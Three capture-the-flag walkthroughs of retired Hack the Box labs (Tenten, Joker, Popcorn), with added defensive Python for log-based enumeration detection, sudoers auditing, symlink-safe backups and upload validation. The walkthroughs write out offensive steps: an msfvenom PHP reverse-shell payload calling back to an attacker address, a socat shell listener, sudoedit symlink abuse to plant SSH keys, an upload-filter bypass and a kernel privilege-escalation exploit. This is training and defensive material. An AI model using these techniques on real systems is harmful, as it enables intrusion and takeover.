Hack the Box Challenge: Tenten Walkthrough


Hello friends!! Today we are going to solve another CTF challenge, “Tenten”, which is available online for those who want to improve their skills in penetration testing and black-box testing. Tenten is a retired vulnerable lab presented by Hack the Box, which offers online penetration-testing practice matched to your experience level; they have a collection of vulnerable labs as challenges from beginner to expert level.
Level: Intermediate
Task: find user.txt and root.txt file in victim’s machine.
Since these labs are available online they have static IPs; the IP of Tenten is 10.10.10.10, so let's begin with nmap port enumeration.
nmap -A 10.10.10.10
From the image below you can observe that ports 22 and 80 are open on the victim's machine.




Knowing port 80 is open, we opened the IP in a browser. The page shows that it is a WordPress website, which is a clear pointer for the next step.




Next we ran wpscan -u http://10.10.10.10/ --enumerate t --enumerate p --enumerate u against the URL we had opened in the browser, to check for vulnerable themes and plugins and to enumerate users.




wpscan enumerated the usernames, and among them we found the user takis.




Next we clicked on Sign Up to register on the site, and saw the Jobs Listing shown below.



After filling in the details for the job, click on Apply Now.



After clicking on Apply Now, the page shown below opened.


As you can see from the previous image, we made a slight change to the URL: we simply replaced the final number with /10/, which opened a page titled Job Application, as shown below.


We then changed the final number in the URL to 11, and this time it opened a page titled Cube.


To save time, we captured the request for this page with Burp Suite and sent it to Intruder for fuzzing.


Inside Intruder we selected position 8, highlighted in the image below, as the payload position to brute-force.


We selected the payload type Numbers and specified the number range as shown below.


The attack began, and payload 13 stood out from the rest, which made us think there might be something different about that page. Its title turned out to be HackerAccessGranted, as you can see below.
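From the defender's side, the Intruder run above leaves a very recognisable trace: one client requesting the same URL pattern with a run of consecutive object IDs. The following is an added example, not code from the original write-up or from Hack the Box, that parses constructed Apache-style access-log lines and flags any (client, URL prefix) pair that walked a run of consecutive IDs. The path /index.php/jobs/apply/<id>/ is a hypothetical stand-in for the job-listing URLs, and the log lines are constructed for this example.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (not from the page). 10.10.14.3 walks IDs 8..13
# one after another, the way an Intruder Numbers payload would; 10.10.14.7 browses normally.
SAMPLE_LOG = """\
10.10.14.3 - - [16/Apr/2017:10:01:01 +0000] "GET /index.php/jobs/apply/8/ HTTP/1.1" 200 5123
10.10.14.3 - - [16/Apr/2017:10:01:02 +0000] "GET /index.php/jobs/apply/9/ HTTP/1.1" 200 5111
10.10.14.3 - - [16/Apr/2017:10:01:02 +0000] "GET /index.php/jobs/apply/10/ HTTP/1.1" 200 5090
10.10.14.7 - - [16/Apr/2017:10:01:03 +0000] "GET /index.php/jobs/apply/10/ HTTP/1.1" 200 5090
10.10.14.3 - - [16/Apr/2017:10:01:03 +0000] "GET /index.php/jobs/apply/11/ HTTP/1.1" 200 5102
10.10.14.3 - - [16/Apr/2017:10:01:04 +0000] "GET /index.php/jobs/apply/12/ HTTP/1.1" 404 1032
10.10.14.3 - - [16/Apr/2017:10:01:04 +0000] "GET /index.php/jobs/apply/13/ HTTP/1.1" 200 7441
10.10.14.7 - - [16/Apr/2017:10:01:05 +0000] "GET /wp-login.php HTTP/1.1" 200 2310
10.10.14.7 - - [16/Apr/2017:10:01:09 +0000] "GET /index.php/jobs/apply/3/ HTTP/1.1" 200 5011
"""

# Common Log Format: client, identd, user, [timestamp], "request", status, bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+'
)
# Split a path into its prefix and a trailing numeric object ID, e.g. /jobs/apply/ + 13
ID_RE = re.compile(r'^(?P<prefix>.*?/)(?P<id>\d+)/?$')


def parse_line(line):
    """Return (ip, url_prefix, object_id, status) for a request with a numeric ID, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    idm = ID_RE.match(m["path"])
    if not idm:
        return None
    return m["ip"], idm["prefix"], int(idm["id"]), int(m["status"])


def flag_enumeration(lines, min_run=5):
    """Map (ip, url_prefix) -> sorted IDs for clients whose longest run of
    consecutive IDs is at least min_run requests long."""
    seen = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, prefix, obj_id, _status = rec
        seen[(ip, prefix)].add(obj_id)

    flagged = {}
    for key, ids in seen.items():
        ordered = sorted(ids)
        run = best = 1
        for a, b in zip(ordered, ordered[1:]):
            run = run + 1 if b == a + 1 else 1   # extend the run or start a new one
            best = max(best, run)
        if best >= min_run:
            flagged[key] = ordered
    return flagged


if __name__ == "__main__":
    for (ip, prefix), ids in flag_enumeration(SAMPLE_LOG.splitlines()).items():
        print(f"{ip} enumerated {prefix} IDs {ids[0]}..{ids[-1]} ({len(ids)} requests)")
```

The run length, not the request count, is the signal: a real user may open a handful of listings, but only a scanner opens 8, 9, 10, 11, 12 and 13 in order. Tuning min_run and adding a time window are the usual refinements; the underlying fix is authorisation on the object (the application should not serve listing 13 to a user who does not own it).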



We know that WordPress stores uploaded files under /wp-content/uploads/%year%/%month%/%filename%, so I guessed that HackerAccessGranted was the name of an uploaded image file and, after many attempts, the following URL worked.

http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
Finally!! It showed a hacker image on the page, and without wasting time I downloaded it.


It was an image of a hacker with the message Access Granted, but I was fairly sure that steganography was involved and that there was a good chance of text hidden inside the image, so next I used the Steghide tool.
steghide extract -sf HackerAccessGranted.jpg
From the image below you can observe that it extracted a file named “id_rsa” from the .jpg image.



When I tried to use this key, it asked for a passphrase.



Then I downloaded a Python script from here for cracking the passphrase of this key, ran the following command and got the desired output.
python sshng2john.py id_rsa > ssh_login
“superpassword” is the passphrase we recovered from the step above.



Without wasting time I executed the following command to log in over SSH, using superpassword as the passphrase.
ssh -i id_rsa takis@10.10.10.10
Great!! I logged in successfully and checked takis's sudo privileges and roles with sudo -l, which showed that he has full privileges, with an entry for /bin/fuckin marked NOPASSWD.
First I explored the current directory, where I found user.txt, and read it with cat.
cat user.txt
Successfully completed 1st task.
Then I moved into /bin/fuckin, where I found the same user.txt file, and without wasting time went into the root directory to look for root.txt.
cd /root
Here I found root.txt and read it with cat.
cat root.txt
Successfully completed 2nd task.

Solving this lab was quite captivating; in particular, hiding the SSH key with steganography is a remarkable effort by the author.
Enjoy Hacking!!



Hack the Box Challenge: Joker Walkthrough


Hello friends!! Today we are going to solve another CTF challenge, “Joker”, a lab presented by Hack the Box for online penetration-testing practice matched to your experience level. They have a collection of vulnerable labs as challenges from beginner to expert level. HTB divides its labs into two groups, Active and Retired; since we can't publish a write-up of any Active lab, we have chosen the retired Joker lab.
Level: Intermediate
Task: find user.txt and root.txt file in victim’s machine.
Since these labs are available online they have static IPs. The IP of Joker is 10.10.10.21, so let's begin with nmap port enumeration.
nmap -A 10.10.10.21
From the image below you can observe that ports 22 and 3128 are open on the victim's machine.




After the aggressive scan we ran a UDP scan to enumerate further ports and found ports 69 and 5355 open.




Since the target machine is running TFTP, we looked for files and found one called passwords; we downloaded it and found that it contains some hashes.
tftp 10.10.10.21
tftp> get passwords




After downloading the file we used John the Ripper with the rockyou.txt wordlist to crack the hashes. We found the password for user kalamari to be ihateseafood.




As the target machine is running a Squid proxy, we configured our browser to route its traffic through the target.




Now when we tried to access the target machine in our browser, we could not load any page.




Since all our traffic is now routed through the proxy, we tried opening localhost in the browser to see whether the behaviour changed. As soon as we opened localhost we were greeted with a login popup.



We used the username and password recovered from the cracked hashes to log in to the page.




We used dirb to enumerate directories and found the /console directory.
dirb http://127.0.0.1 -p 10.10.10.21:3128 -P kalamari:ihateseafood -r




When we opened the /console directory we found a page that acts as a Python interpreter.







We used socat to set up our listener, as netcat could not give us a stable tty shell in which to run our commands.
socat file:`tty`,raw,echo=0 udp-listen:4444




After gaining a reverse shell we looked at the sudoers file and found that we can run sudoedit on the file /var/www/*/*/layout.html as alekos. sudoedit is a command for editing a file with the privileges of another user.





Since the file listed in the sudoers entry is matched by wildcards, we can use a symlink to make a file that matches the pattern point at a file we want to edit with sudoedit. We found the .ssh folder for user alekos, so we link authorized_keys to layout.html; editing it lets us add our own public key, so that we can log in over SSH with our private key.
cd /var/www/
cd testing
mkdir test
cd test
ln -s /home/alekos/.ssh/authorized_keys layout.html


Now we use sudoedit as user alekos to edit alekos's authorized_keys.
sudoedit -u alekos /var/www/testing/test/layout.html
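Both boxes fall to a sudoers entry: Tenten's takis has a NOPASSWD rule with full privileges, and Joker's rule lets sudoedit run on a wildcard path that the caller can satisfy with a fresh directory and a symlink. The following is an added example, not code from the write-up or from Hack the Box, that parses a sudoers fragment and flags exactly those two patterns, and shows the hardened rule beside the weak one. The sample rules are constructed for this example, modelled on what the two walkthroughs describe rather than copied from the boxes' real files.

```python
import re
import shlex
from os.path import basename

GLOB_CHARS = set("*?[")
# user host=(runas) [TAG:]... command[, command...]
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAG_RE = re.compile(r"^([A-Z_]+):\s*")  # NOPASSWD:, NOEXEC:, SETENV:, FOLLOW:, ...
SKIP_PREFIXES = ("#", "@", "Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")

# Constructed sample: a NOPASSWD: ALL rule like the one takis had, and the
# wildcard sudoedit rule that the symlink trick above abuses.
SAMPLE_SUDOERS = """\
# constructed sample, not a real sudoers file
Defaults env_reset
takis ALL=(ALL) NOPASSWD: ALL
www-data ALL=(alekos) NOPASSWD: sudoedit /var/www/*/*/layout.html
alekos ALL=(root) /usr/bin/systemctl restart nginx, /usr/bin/systemctl status nginx
"""

# Same intent, but the editable path is fixed: the caller cannot make a new
# directory match the rule or swap a symlink in for layout.html.
HARDENED_SUDOERS = """\
www-data ALL=(alekos) NOPASSWD: sudoedit /var/www/testing/layout.html
alekos ALL=(root) /usr/bin/systemctl restart nginx
"""


def parse_rules(text):
    """Return (user, runas, tags, command) for every command in every user specification."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for spec in m["cmds"].split(","):
            spec = spec.strip()
            tags = set()
            t = TAG_RE.match(spec)
            while t:                      # peel off every leading TAG: before the command
                tags.add(t.group(1))
                spec = spec[t.end():]
                t = TAG_RE.match(spec)
            rules.append((m["user"], m["runas"] or "root", tags, spec))
    return rules


def audit_sudoers(text):
    """Return (user, finding, command) triples for the two risky patterns."""
    findings = []
    for user, _runas, tags, cmd in parse_rules(text):
        if cmd == "ALL":
            if "NOPASSWD" in tags:        # full privilege with no authentication at all
                findings.append((user, "nopasswd-all", cmd))
            continue
        argv = shlex.split(cmd)
        if any(GLOB_CHARS & set(arg) for arg in argv[1:]):
            # A glob in an argument lets the caller pick which file the rule matches;
            # with sudoedit that means pointing the edit at any file via a symlink.
            kind = "sudoedit-wildcard" if basename(argv[0]) == "sudoedit" else "wildcard-arg"
            findings.append((user, kind, cmd))
    return findings


if __name__ == "__main__":
    for user, kind, cmd in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user}: {kind}: {cmd}")
    print("hardened findings:", audit_sudoers(HARDENED_SUDOERS))
```

The auditor is deliberately narrow: it reads only user specifications and ignores aliases and Defaults, so it is a quick check to run over sudoers and sudoers.d files rather than a full parser. A wildcard anywhere after the command name is the thing to hunt for, whether the command is sudoedit, tar, or a shell script.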


Now we generate a key pair on our system so that we can paste the public key into authorized_keys and use our private key to log in.
ssh-keygen


Now we open the public key we just generated and copy it.
cat id_rsa.pub


We paste it into the file on the target machine and save it.


Now we use the private key we generated to log in to the target over SSH. As soon as we are logged in we find user.txt in alekos's home directory; we open it and find the first flag.

ssh -i id_rsa alekos@10.10.10.21


We start enumerating directories; in the backup directory we find a few tape archive files, and when we extract them we find that they contain a backup of the development directory.


Now we rename the development directory to dev and create a symlink named development that points to the root directory.
mv development dev
ln -s /root development



We then wait a few minutes for the backup job to archive the new development folder. As development is now linked to the root folder, the job backs up the root folder. We open the newly created tape archive, find a file called root.txt, open it and find the final flag.
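The page does not show the backup job itself, only that it followed the symlink; the failure is a privileged job that dereferences links inside a directory an unprivileged user controls. The following is an added example, not the box's cron job or any code from the write-up, of a backup routine that refuses a symlinked source directory and skips symlinked entries inside it. The directory layout and file contents in demo() are constructed for this example.

```python
import os
import tarfile
import tempfile


def safe_backup(src_dir, out_path):
    """Archive src_dir into out_path without ever following a symlink.
    Returns the paths that were skipped so the job can log them."""
    if os.path.islink(src_dir):
        # The trick above: the whole source directory swapped for a link to /root.
        raise ValueError(f"refusing to back up symlinked source: {src_dir}")
    skipped = []
    with tarfile.open(out_path, "w:gz") as tar:
        # os.walk defaults to followlinks=False, but still lists linked dirs in `dirs`;
        # prune them explicitly so they are neither walked nor archived.
        for root, dirs, files in os.walk(src_dir):
            for d in list(dirs):
                path = os.path.join(root, d)
                if os.path.islink(path):
                    skipped.append(path)
                    dirs.remove(d)
            for f in files:
                path = os.path.join(root, f)
                if os.path.islink(path):          # linked file: skip, never dereference
                    skipped.append(path)
                    continue
                tar.add(path, arcname=os.path.relpath(path, src_dir))
    return skipped


def demo():
    """Constructed layout: a 'development' tree with a planted link to a 'root' directory.
    Returns (archived names, skipped basenames, whether a symlinked source was refused)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "root")
        os.mkdir(secret)
        with open(os.path.join(secret, "root.txt"), "w") as fh:
            fh.write("constructed placeholder, not a real flag\n")

        dev = os.path.join(tmp, "development")
        os.mkdir(dev)
        with open(os.path.join(dev, "app.py"), "w") as fh:
            fh.write("print('hello')\n")
        os.symlink(secret, os.path.join(dev, "data"))   # planted link inside the tree

        out = os.path.join(tmp, "dev.tar.gz")
        skipped = safe_backup(dev, out)
        with tarfile.open(out) as tar:
            names = sorted(tar.getnames())

        link = os.path.join(tmp, "development_link")     # whole source replaced by a link
        os.symlink(secret, link)
        try:
            safe_backup(link, os.path.join(tmp, "link.tar.gz"))
            refused = False
        except ValueError:
            refused = True
        return names, [os.path.basename(p) for p in skipped], refused


if __name__ == "__main__":
    print(demo())
```

Skipping links is only half of the fix: the job should also not run as root over a directory writable by a less-privileged user, or the user can still change what gets archived.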




Hack the Box Challenge: Popcorn Walkthrough


Hello friends!! Today we are going to solve another CTF challenge, “Popcorn”, which is available online for those who want to improve their skills in penetration testing and black-box testing. Popcorn is a retired vulnerable lab presented by Hack the Box, which offers online penetration-testing practice matched to your experience level; they have a collection of vulnerable labs as challenges from beginner to expert level.
Level: Intermediate
Task: find user.txt and root.txt file in victim’s machine.
Since these labs are available online they have static IPs; the IP of Popcorn is 10.10.10.6, so let's begin with nmap port enumeration.
nmap -A 10.10.10.6
From the image below you can observe that ports 22 and 80 are open on the victim's machine.



Knowing port 80 is open, we opened the IP in a browser, but did not get any useful clue for the next step.



Next we used Kali's dirb tool to enumerate directories on the IP address with the command dirb http://10.10.10.6. After checking most of the directories, we decided to look at /torrent.



So next we opened http://10.10.10.6/torrent/ in the browser and saw the webpage shown below. After looking at the page for clues, we saw that we needed to register on the site first.



Clicking the Register option on the webpage opens the registration form shown below. As you can see, you need to fill in your details to register on the site.



After registering successfully, click on the Upload option; the page that opens is shown below. Here we supplied the path of any torrent file and clicked Upload.



When the torrent file has uploaded, we are redirected to the page shown below. Now simply click on the Edit this torrent option.



Now we created a PHP payload with Metasploit using the command msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.3 lport=4321 -f raw.



The problem we hit was that the Update Screenshot option would not accept a .php file. So we renamed the file with a double extension, 123.php.png, and clicked Submit Screenshot.



Before clicking Submit Screenshot we captured the request with Burp Suite, where you can see that our file with the double extension is being submitted.



As you can see, we edited the file name in the request to 123.php. Now click Forward in Burp Suite.



Next we saw that our file had been uploaded successfully.
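The upload passed because the server trusted what the client sent: a double extension got past the first check, and once the request was edited in Burp the stored name was whatever the client chose. The following is an added example, not code from the write-up or from the torrent application, that puts a weak check of that shape next to a hardened one: a single allow-listed extension, magic bytes that must match it, and a server-chosen random file name. The PHP stub and PNG header bytes are constructed for this example.

```python
import os
import secrets

# Magic bytes for the image types a screenshot upload is meant to accept.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Constructed inputs: a harmless PHP stub standing in for the payload, and a PNG header.
PHP_BYTES = b"<?php echo 'constructed sample'; ?>"
PNG_BYTES = MAGIC["png"] + b"\x00\x00\x00\rIHDR" + b"\x00" * 17


def weak_accept(filename, content_type, data):
    """Weak check: trusts the client-supplied Content-Type and keeps the client's
    file name. A request edited to carry image/png and the name 123.php walks past it.
    Returns the name that would be stored, or None."""
    if not content_type.startswith("image/"):
        return None
    return os.path.basename(filename)


def hardened_accept(filename, content_type, data):
    """Server decides everything: exactly one allow-listed extension, file bytes that
    match that extension, and a random stored name. Returns the stored name or None."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) != 2 or parts[1] not in MAGIC:
        return None                      # rejects 123.php, 123.php.png and bare names
    ext = parts[1]
    if not data.startswith(MAGIC[ext]):
        return None                      # name says png, so the bytes must say png
    return f"{secrets.token_hex(16)}.{ext}"   # client's name never reaches disk


if __name__ == "__main__":
    print("weak:     ", weak_accept("123.php", "image/png", PHP_BYTES))
    print("hardened: ", hardened_accept("123.php", "image/png", PHP_BYTES))
    print("hardened: ", hardened_accept("shot.png", "image/png", PNG_BYTES))
```

Two further controls make the stored file harmless even if the check is wrong: keep the upload directory outside the web root (or serve it with script execution disabled), and send X-Content-Type-Options: nosniff so the browser does not reinterpret it.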



Next we again used dirb to enumerate directories, this time with dirb http://10.10.10.6/torrent/. After checking most of the directories, we decided to look at /torrent/upload/.



So next we opened http://10.10.10.6/torrent/upload/ in the browser and saw the page shown below, where our file is listed as successfully uploaded. We then clicked on the file we had uploaded.



We used Metasploit's multi/handler and got a Meterpreter session, as you can see below.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.3
msf exploit(multi/handler) > set lport 4321
msf exploit(multi/handler) > exploit
Once we had the Meterpreter session, we ran cd /home. Then we looked inside the george directory with ls /home/george, where we found user.txt and read its contents, which contain our first FLAG!!



Next we searched Google for a kernel exploit and found one used for local privilege escalation, which we simply downloaded to our Desktop.


As you can see, we uploaded it with the command upload /root/Desktop/15704.c. Then we used the shell command to get a system shell, compiled the exploit and made it executable, which gave us root privileges. With cd /root we found the root.txt file, and we viewed its contents with cat root.txt. There we found our final FLAG!!